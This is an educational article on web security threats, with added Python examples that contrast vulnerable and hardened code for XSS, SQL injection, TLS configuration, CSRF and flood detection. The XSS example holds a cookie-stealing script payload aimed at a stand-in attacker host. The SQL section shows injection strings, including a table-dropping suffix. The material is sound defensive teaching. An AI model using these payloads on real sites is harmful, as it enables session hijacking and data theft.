The Whys and Wherefores of Web Security

Since the advent of the Internet, cybersecurity has faced new challenges created by the massively expanded accessibility and interconnectedness of the web. Where security was once dealt with in clearly separated layers, those layers have become so fuzzy and stretched that they barely exist any more.


Web security extends outwards from the browser, across web servers and into web-API-based applications, and back again. We have created a universe of free-flowing data that needs a multitude of controls to protect data, systems and people.

Websites and browsers can be like an open door to cybercriminals, who exploit vulnerabilities within the software to insert malicious code or to take websites down. I’ll expand on some of the more common threats to our web health and discuss the implications and the resolutions to each.

Software Vulnerabilities

The software used to build a website, and the extended web services needed to interconnect it across the Internet, are all open to exploitation through vulnerabilities in the underlying code. In addition, content management systems such as WordPress and Joomla, and the application ecosystems that grow around them through modules, plug-ins and themes, have opened a large number of additional entry points that affect web security.

One of the most common attack types is Cross-Site Scripting (XSS). XSS is a type of injection attack: the attacker gets a piece of JavaScript into a page served by a legitimate web application, typically by supplying it in a form field, a URL parameter or a stored comment that the application later writes into its HTML without encoding it. The victim's browser cannot tell the injected script from the site's own, so it runs with full access to the page and its cookies. CMS community code, such as plug-ins, is a notorious vector for XSS. A successful XSS attack can compromise a user's account on a website by hijacking their web session and cookies. Jetpack, one of WordPress's most popular plug-ins, had an XSS vulnerability which affected its one million users.

Software vulnerabilities are present in pretty much all software code, but certain practices can minimise their impact. Good secure coding practices remove many potential areas of exploitation; for XSS, the key one is encoding every piece of untrusted data for the HTML context it is written into, and the Open Web Application Security Project (OWASP) has an excellent guide on this topic. A Web Application Firewall (WAF) is another way of helping to reduce the risk of XSS attacks, although it should be treated as a second layer rather than a substitute for correct encoding. Finally, making sure software is promptly patched when a fix is released is a fundamental part of creating a secure web.
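The following is an added example, not code from the original article or from any of the products it mentions: the same comment-rendering function written first with raw string concatenation (the XSS bug described above) and then with contextual HTML encoding. The function names, the markup and the two attacker payloads are constructed for illustration.

```python
"""Vulnerable and hardened rendering of untrusted comment data (added example)."""
import html

# Constructed attacker inputs. The first targets the element-body context and
# tries to ship the session cookie to an attacker host; the second targets the
# double-quoted attribute context and breaks out of it with a stray quote.
SCRIPT_PAYLOAD = '<script>new Image().src="https://evil.example/?c="+document.cookie</script>'
ATTR_PAYLOAD = '" onmouseover="alert(document.cookie)'


def render_comment_unsafe(author: str, body: str) -> str:
    """Vulnerable: untrusted text is pasted straight into the HTML, so the
    browser parses the attacker's markup as part of the page."""
    return f'<div class="comment" data-author="{author}"><p>{body}</p></div>'


def render_comment_safe(author: str, body: str) -> str:
    """Hardened: every untrusted value is HTML-encoded for the context it lands in.

    html.escape(quote=True) encodes & < > " and '. That is sufficient for an
    element body (<p>...</p>) and for a double-quoted attribute value; other
    contexts (URLs, inline JavaScript, CSS) need their own encoders.
    """
    return (
        f'<div class="comment" data-author="{html.escape(author, quote=True)}">'
        f'<p>{html.escape(body, quote=True)}</p></div>'
    )


def contains_active_script(markup: str) -> bool:
    """Crude indicator used only to show the difference: does a real <script>
    tag (rather than the encoded text &lt;script&gt;) survive into the output?"""
    return '<script' in markup.lower()


if __name__ == '__main__':
    print(render_comment_unsafe('mallory', SCRIPT_PAYLOAD))
    print(render_comment_safe('mallory', SCRIPT_PAYLOAD))
    print(render_comment_unsafe(ATTR_PAYLOAD, 'hi'))
    print(render_comment_safe(ATTR_PAYLOAD, 'hi'))
```

The point of the attribute payload is that encoding `<` and `>` alone is not enough: a quote character is what breaks out of an attribute, which is why the encoder is chosen per context rather than as a single global filter.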

Database Injection Attacks

Data drives the Internet and it is the biggest risk factor: cybercriminals are increasingly after Personally Identifiable Information (PII), as exemplified by 2014 seeing the highest number of data breaches ever recorded in U.S. history, an increase of 27.5% over 2013.

Cybercriminals look at all aspects of web security to find a way in. One of these is the database that stores application data, and often the login credentials for user accounts as well. Databases underpin almost every web application; in one form or another, that is where everything is stored.

Whether you are using a SQL (e.g. MS SQL) or NoSQL (e.g. MongoDB) database, you are at risk of an injection attack. Injection happens when untrusted input, such as a form field, is concatenated into a query rather than passed to the database as data, so the input can change the structure of the query itself. A cybercriminal can exploit poorly handled form fields on a website to run queries of their own choosing; the result ranges from reading rows the user should never see to the entire content of the database being dumped to the waiting attacker. The remediation is secure coding, above all parameterised queries (prepared statements) and validating that input has the expected type, with a WAF deployed as an additional layer.
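As an added example that is not part of the original article, here is a user lookup written both ways against an in-memory SQLite table. The users, the table layout and the function names are constructed for illustration; the attacker input is the classic tautology that turns "find this one user" into "return every user".

```python
"""SQL injection: string-built query beside a parameterised one (added example)."""
import sqlite3

# Constructed sample data, not a real user base. Password hashes are placeholders.
USERS = [
    ('alice', 'pbkdf2$placeholder-alice', 'alice@example.com'),
    ('bob', 'pbkdf2$placeholder-bob', 'bob@example.com'),
    ('carol', 'pbkdf2$placeholder-carol', 'carol@example.com'),
]

# Constructed attacker input: closes the string literal and appends a condition
# that is always true, so the WHERE clause matches every row.
INJECTION = "' OR '1'='1"


def make_db() -> sqlite3.Connection:
    """Fresh in-memory database holding the constructed users."""
    conn = sqlite3.connect(':memory:')
    conn.execute('CREATE TABLE users (username TEXT, pw_hash TEXT, email TEXT)')
    conn.executemany('INSERT INTO users VALUES (?, ?, ?)', USERS)
    return conn


def find_user_unsafe(conn: sqlite3.Connection, username: str) -> list:
    """Vulnerable: the form field is spliced into the SQL text, so whatever the
    user typed becomes part of the query's grammar, not just its data."""
    query = f"SELECT username, email FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()


def find_user_safe(conn: sqlite3.Connection, username: str) -> list:
    """Hardened: the value travels to the engine as a bound parameter. The query
    structure is fixed before the value is seen, so the input can only ever be
    compared as a string, quotes and all."""
    return conn.execute(
        'SELECT username, email FROM users WHERE username = ?', (username,)
    ).fetchall()


if __name__ == '__main__':
    db = make_db()
    print('unsafe:', find_user_unsafe(db, INJECTION))   # every row comes back
    print('safe:  ', find_user_safe(db, INJECTION))     # nobody is called "' OR '1'='1"
```

Two caveats from the example. First, Python's sqlite3 module refuses stacked statements in execute(), so a payload ending in `; DROP TABLE users` fails here, but many other drivers happily run it; the parameterised form is the fix in every case, not the driver's quirks. Second, the NoSQL variant is the same mistake in a different syntax: accepting a JSON object such as `{"$ne": null}` where a plain string was expected lets the client rewrite the query operator, and the remedy is likewise to coerce untrusted input to the type the query expects before it reaches the database.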

Database Exploitation

The storage of data within a web context is also an area that can be misconfigured at the cost of user data. PCI compliance is one area that has been developed to address past misdemeanours in the storage of financial details. However, this wasn't enough for JPMorgan Chase, who in 2014 had 83 million customer accounts exposed because of a breach involving poorly implemented server authentication (see the section on Web Access Controls and the Human Factor). The PCI Security Standards Council now lists a WAF as one accepted way of protecting public-facing web applications against this type of attack (PCI DSS requirement 6.6, the alternative being regular application vulnerability assessment). Database security is a whole area of discussion in its own right, but strong two-factor authentication and a deep understanding of how database encryption is correctly used are integral parts of that discussion.

Poorly Implemented SSL

Most websites that handle sensitive data, such as login credentials and personal data, are configured to use the security protocol Secure Sockets Layer (SSL) or its successor Transport Layer Security (TLS) to create an HTTPS connection. The problem is that the protocol can be misconfigured during implementation and the protection then bypassed; delivering the login page over plain HTTP, or serving it over HTTPS but without HTTP Strict Transport Security (HSTS) and without the Secure flag on the session cookie, are typical examples. A number of Wi-Fi attack devices are now cheaply available. Devices such as the Wi-Fi Pineapple, a legitimate penetration-testing tool, can put an attacker in the middle of a victim's connection; against a poorly configured site the attacker strips or downgrades HTTPS, grabs the user's credentials and takes over the account. Serving everything over HTTPS, enabling HSTS, marking cookies Secure and HttpOnly, and allowing only current TLS versions and cipher suites are the basic remediation.
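The check below is an added example, not part of the original article: it inspects one response to a login-page request for the misconfigurations just described (page served over HTTP, HTTPS without HSTS, session cookie without Secure or HttpOnly). The URLs, header values and finding texts are constructed for the example.

```python
"""Audit a login-page response for transport misconfigurations (added example)."""
from urllib.parse import urlparse


def audit_login_response(url: str, headers: list) -> list:
    """Return a list of findings for one response to a login-page request.

    headers is a list of (name, value) pairs exactly as the wire carries them;
    Set-Cookie may legitimately appear several times, so a dict would lose entries.
    """
    findings = []
    scheme = urlparse(url).scheme.lower()
    if scheme != 'https':
        # The form itself, and the credentials posted back, cross the network in clear.
        findings.append('login page served over plain HTTP')
    names = {name.lower() for name, _ in headers}
    if scheme == 'https' and 'strict-transport-security' not in names:
        # Without HSTS a later plain-HTTP visit can be intercepted and kept on HTTP
        # by an on-path attacker, which is exactly what sslstrip-style tools do.
        findings.append('no Strict-Transport-Security header')
    for name, value in headers:
        if name.lower() != 'set-cookie':
            continue
        cookie_name = value.split('=', 1)[0].strip()
        # Attribute names after the first "name=value" pair, case-insensitive.
        attrs = {part.strip().split('=', 1)[0].lower() for part in value.split(';')[1:]}
        if 'secure' not in attrs:
            findings.append(f'cookie {cookie_name} lacks Secure (browser will also send it over HTTP)')
        if 'httponly' not in attrs:
            findings.append(f'cookie {cookie_name} lacks HttpOnly (readable by injected script)')
    return findings


# Constructed responses: one misconfigured, one as it should look.
BAD_URL = 'http://shop.example/login'
BAD_HEADERS = [
    ('Content-Type', 'text/html'),
    ('Set-Cookie', 'session=abc123; Path=/'),
]
GOOD_URL = 'https://shop.example/login'
GOOD_HEADERS = [
    ('Content-Type', 'text/html'),
    ('Strict-Transport-Security', 'max-age=31536000; includeSubDomains'),
    ('Set-Cookie', 'session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax'),
]

if __name__ == '__main__':
    for finding in audit_login_response(BAD_URL, BAD_HEADERS):
        print('FINDING:', finding)
    print('good response findings:', audit_login_response(GOOD_URL, GOOD_HEADERS))
```

This covers the application-level half of the problem. Whether the server also still offers obsolete protocol versions or weak cipher suites is a separate check that needs a TLS scanner such as `openssl s_client` or testssl.sh against the live endpoint.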

Cross Site Request Forgery

Cross-Site Request Forgery (CSRF) is a common way that cybercriminals attack web security. A CSRF attack is typically delivered as a form POST aimed at a target website. So, for example, a user navigates to a spoof site that contains the CSRF exploit while also being logged in, in the same browser, to a legitimate site, say an e-commerce site where they have an account. Because the browser automatically attaches the user's session cookie to every request sent to the e-commerce site, no matter which page triggered it, the spoof site can POST its forged request through the user's browser into the back end of the application the user is logged in to, and the application treats it as the user's own action. The hacker can then do all sorts of things, including transferring money to their own bank account.

Thankfully, there are ways of preventing this type of attack. The standard one is a hidden, unpredictable per-session token in every state-changing form that the server checks on submission; a spoof site cannot read it because of the same-origin policy. CAPTCHAs or re-authentication for sensitive actions, a WAF and the SameSite cookie attribute supported by modern browsers add further layers, and at the front end, educating users about the risks.
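An added example (not from the original article) of the hidden-token defence for the transfer scenario above, with the server's handling of a forged request beside a legitimate one. The in-memory session store, the form field name, the route and the response strings are all assumptions made for the example.

```python
"""Synchroniser-token CSRF protection for a money-transfer form (added example)."""
import hmac
import secrets

# Stand-in for a real server-side session store: session id -> session data.
SESSIONS = {}
FIELD = 'csrf_token'  # assumed name of the hidden form field


def new_session(user: str) -> str:
    """Log a user in: mint a session id (the cookie value) and a per-session CSRF token."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {'user': user, 'csrf': secrets.token_urlsafe(32)}
    return sid


def render_transfer_form(sid: str) -> str:
    """The legitimate site embeds the session's token in every state-changing form."""
    token = SESSIONS[sid]['csrf']
    return ('<form method="POST" action="/transfer">'
            f'<input type="hidden" name="{FIELD}" value="{token}">'
            '<input name="to"><input name="amount"><button>Send</button></form>')


def handle_transfer(sid: str, form: dict) -> str:
    """Server side of POST /transfer.

    sid is the session cookie. The browser attaches it to any request to this site,
    including one a spoof page triggers, so the cookie alone proves nothing about
    where the request came from. The token does: the attacker's page cannot read
    it (same-origin policy), so a forged POST cannot include the right value.
    """
    session = SESSIONS.get(sid)
    if session is None:
        return '401 not logged in'
    submitted = form.get(FIELD, '')
    # Constant-time comparison on bytes, so a non-ASCII submission cannot raise.
    if not hmac.compare_digest(submitted.encode(), session['csrf'].encode()):
        return '403 CSRF token missing or invalid'
    return f"200 transferred {form['amount']} to {form['to']} for {session['user']}"


def demo() -> tuple:
    """Three requests against one victim session: a forged POST with no token,
    a forged POST carrying a token from the attacker's own session, and the
    legitimate submission of the rendered form."""
    victim = new_session('victim')
    attacker_own = new_session('attacker')
    forged = handle_transfer(victim, {'to': 'attacker', 'amount': '1000'})
    cross_session = handle_transfer(victim, {'to': 'attacker', 'amount': '1000',
                                             FIELD: SESSIONS[attacker_own]['csrf']})
    legit = handle_transfer(victim, {'to': 'friend', 'amount': '10',
                                     FIELD: SESSIONS[victim]['csrf']})
    return forged, cross_session, legit


if __name__ == '__main__':
    for result in demo():
        print(result)
```

The second forged request matters in practice: an attacker can always obtain a valid token for an account they control, so the token must be bound to the session it was issued for, not merely checked against the set of all tokens the server has ever issued.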

Web Access Controls and the Human Factor

Access control to a user's account on a web application is an area that is still evolving. Password fatigue is setting in at the same time that cybercrime and identity theft are soaring.

If you analyse some of the largest breaches of the last two years, you will find that stolen credentials are the starting point of the attack. According to several studies, including the Verizon Data Breach Investigations Report, up to 80% of breaches can be attributed to stolen credentials, and stolen credentials play a major part in lost data, including financial information. These credentials are often stolen using web-based attack vectors. Because of the openness and accessibility of the Internet, the number of points at which a person can be tricked has multiplied; it is almost as if everyone is an 'insider threat'.

Social engineering has reared its head in recent years with the advent of phishing and spear phishing and their associated spoof websites. Socially engineered attacks are arguably the most difficult to deal with, as they depend on human behaviour, and spear phishing in particular is highly successful: security firm FireEye, in a 2014 report on spear-phishing attacks, found that spear-phishing emails had a 70% open rate, and that 50% of those who opened them clicked through to a spoof website. Second-factor authentication is one measure that helps to reduce the risk from stolen credentials, because a password captured by a spoof site is no longer enough on its own.

Malvertising

Malvertising is the new kid on the block of cyber threats: cybercriminals place malicious online ads that infect the machines of site visitors via their browser, typically by redirecting it to an exploit kit that targets unpatched browser or plug-in vulnerabilities. Malvertising has become an increasing threat. Google had to remove 350 million 'bad ads' from its DoubleClick network last year, many of them serving up one of the most sinister forms of malware, ransomware, which extorts up to $1000 from infected users.

DoS Attacks

Denial of Service (DoS) and Distributed Denial of Service (DDoS) attacks are where an attacker floods a website or application with traffic, exhausting its bandwidth or resources so that the service becomes unavailable. The latter, DDoS, uses a 'botnet': a large number of users' PCs on which malware has previously been (surreptitiously) installed. A 'bot herder' then commands this malware to flood a specific website, effectively disabling the service so the site can't operate. DDoS has been used as an effective method by hacktivists, and by the Chinese government against the U.S. government, and it is now also being used as a smokescreen, keeping an organisation busy rectifying the DDoS attack while cybercriminals insert malware elsewhere on its network.
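The detector below is an added example and not part of the original article: it counts requests per source address within a sliding window over access-log lines and flags sources that behave like flood participants. The log lines are constructed (in the common Apache/nginx combined format), and the window, threshold and addresses are assumptions.

```python
"""Flag flood sources in web access logs with a per-source sliding window (added example)."""
import re
from collections import defaultdict
from datetime import datetime

# Leading fields of the combined log format: ip ident user [timestamp] "request" status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')
TS_FMT = '%d/%b/%Y:%H:%M:%S %z'


def _line(ip: str, second: int, path: str = '/') -> str:
    """Build one constructed log line at 13:55:<second> on a fixed date."""
    return f'{ip} - - [10/Oct/2015:13:55:{second:02d} +0000] "GET {path} HTTP/1.1" 200 512'


# Constructed sample: two ordinary visitors browsing at human pace, and three bots
# that each hit the front page four times a second for ten seconds.
SAMPLE_LOG = [_line('203.0.113.5', s, p) for s, p in ((1, '/'), (20, '/cart'), (45, '/checkout'))]
SAMPLE_LOG += [_line('203.0.113.9', 30, '/')]
for bot in ('198.51.100.1', '198.51.100.2', '198.51.100.3'):
    SAMPLE_LOG += [_line(bot, s) for s in range(10) for _ in range(4)]


def flood_sources(lines, window_s: int = 10, threshold: int = 20) -> dict:
    """Return {ip: peak_requests} for every source whose request count inside some
    window_s-second span reaches threshold. Lines that do not parse are skipped."""
    times = defaultdict(list)
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        times[match['ip']].append(datetime.strptime(match['ts'], TS_FMT).timestamp())
    flagged = {}
    for ip, stamps in times.items():
        stamps.sort()
        start = 0
        peak = 0
        for end, t in enumerate(stamps):
            # Advance the window start until it is within window_s of the newest hit.
            while t - stamps[start] >= window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


if __name__ == '__main__':
    for ip, peak in sorted(flood_sources(SAMPLE_LOG).items()):
        print(f'{ip}: {peak} requests within 10 s')
```

Per-source counting like this catches a small botnet or a single misbehaving client and can feed an edge block list, but it is not a DDoS defence on its own: a large botnet keeps each bot below any per-source threshold, and a volumetric flood saturates the link before the web server ever logs a line, which is why upstream filtering or scrubbing is still needed. An aggregate count per URL or per endpoint, using the same sliding window, is the natural complement for the many-sources case.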

Meeting the Web Security Challenge

The Internet has given us incredible freedom of communication and access to many types of services. With every great innovation come challenges, and web security is one of them. The distributed nature of the Internet also means we need to be more innovative about how we protect those distributed resources. Correct implementation of web applications and their extended hosting infrastructure helps to protect data, both stored and in transit. Applying the correct tools, such as Web Application Firewalls, lets us combat modern web attack techniques, which take advantage of the very nature of the Internet: its openness and connectivity. Knowing where the issues lie in web security and how cybercriminals make use of vulnerabilities helps us to formulate a robust security strategy. The right implementation standards and the right tools let us make sure that our websites and services are secure and that data security and privacy are upheld.


Author Details

Mathias Wyss

Product Manager Web Access Management & Security Expert @ United Security Providers, MSc ETH, CISSP
